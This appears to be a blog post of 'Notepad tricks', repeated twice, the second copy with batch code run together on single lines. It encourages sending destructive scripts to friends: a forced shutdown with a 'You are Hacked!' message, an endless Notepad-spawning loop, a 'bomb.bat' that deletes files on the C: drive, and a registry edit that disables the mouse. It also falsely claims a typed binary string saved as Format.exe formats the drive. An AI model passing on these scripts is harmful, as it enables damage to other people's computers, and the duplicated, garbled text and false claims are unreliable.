Interesting Notepad Tricks
1. Create Notepad Virus that Shutdown your Friend Computer with Message
Open Notepad and Type:-
Save it as “shutdownvirus.bat”.
2. Open 100s of Notepad Tab to Crash a Computer.
Save it as “Unlimitednotepad.bat” and send it to your friends.
3. Make A Personal Log-Book or A Diary
Open Notepad and type:
Save it as “personaldiary.txt”.
When you open the file again you will see the current date and time is inserted automatically after the LOG line. This will happen automatically every time you reopen the notepad file.
4. Test Your Anti-Virus Program effectiveness
Test your antivirus is work or not from type this below code in your notepad.
Copy the code given below in your notepad file:
Save it as “virus.exe” on your computer.
When you save that file in your Computer, you antivirus prompt and say this is working virus. So you know antivirus is working properly on your Window PC Computer.
5. Create Matrix Movie Computer Screen Effects in Your Computer
Open Notepad and Type:
Save the file name as ”matrix .bat ” in your Computer.
6. Constantly Repeat Notepad Messages
Save the file name but with “continue.bat” extension on your computer. When you open this file in your computer, you see message line by line without type anything.
7. Format your Whole Hard Disk from Type Code in Notepad
This is really interesting things for you guys, you can format any Hard Drive from typing below code on the computer.
Open notepad and type the below code in your Computer.
Save it as “Format.exe” file giving any name you desire.
That’s It! Now just double click on the file (to open it) and your C: drive will be formatted!
This is just a little binary trick. Be Careful while using it.
8. Write Simple Undetectable Virus
And save that as bomb.bat in your Computer.
Warning: Never run this file on your Computer, because this file deletes your entire system C: Drive.
9. Disable the Mouse Controls in Computer
Never try this trick in your Computer, because this trick disables your mouse.
Note : ALL THE ABOVE TRICKS IS ONLY FOR EDUCATIONAL PURPOSE. DON'T USE TO HARM ANYONE.
Open Notepad and Type:-
@echo offShutdown.exe -s -t 10clsmsg * You are Hacked!Save it as “shutdownvirus.bat”.
2. Open 100s of Notepad Tab to Crash a Computer.
@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO topSave it as “Unlimitednotepad.bat” and send it to your friends.
3. Make A Personal Log-Book or A Diary
Open Notepad and type:
.LOG (in capital letters)Save it as “personaldiary.txt”.
When you open the file again you will see the current date and time is inserted automatically after the LOG line. This will happen automatically every time you reopen the notepad file.
4. Test Your Anti-Virus Program effectiveness
Test your antivirus is work or not from type this below code in your notepad.
Copy the code given below in your notepad file:
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*Save it as “virus.exe” on your computer.
When you save that file in your Computer, you antivirus prompt and say this is working virus. So you know antivirus is working properly on your Window PC Computer.
5. Create Matrix Movie Computer Screen Effects in Your Computer
Open Notepad and Type:
@echo offcolor 02:startecho %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%goto startSave the file name as ”matrix .bat ” in your Computer.
6. Constantly Repeat Notepad Messages
@ECHO off:Beginmsg * Himsg * Are you having fun?msg * I am!msg * Let's have fun together!msg * Because you have been o-w-n-e-dGOTO BEGINSave the file name but with “continue.bat” extension on your computer. When you open this file in your computer, you see message line by line without type anything.
7. Format your Whole Hard Disk from Type Code in Notepad
This is really interesting things for you guys, you can format any Hard Drive from typing below code on the computer.
Open notepad and type the below code in your Computer.
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000Save it as “Format.exe” file giving any name you desire.
That’s It! Now just double click on the file (to open it) and your C: drive will be formatted!
This is just a little binary trick. Be Careful while using it.
8. Write Simple Undetectable Virus
@Echo offDel C:\ *.* |yAnd save that as bomb.bat in your Computer.
Warning: Never run this file on your Computer, because this file deletes your entire system C: Drive.
9. Disable the Mouse Controls in Computer
rem Disable Mouseset key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”reg delete %key%reg add %key% /v Start /t REG_DWORD /d 4Never try this trick in your Computer, because this trick disables your mouse.
Note : ALL THE ABOVE TRICKS IS ONLY FOR EDUCATIONAL PURPOSE. DON'T USE TO HARM ANYONE.
Comments
Post a Comment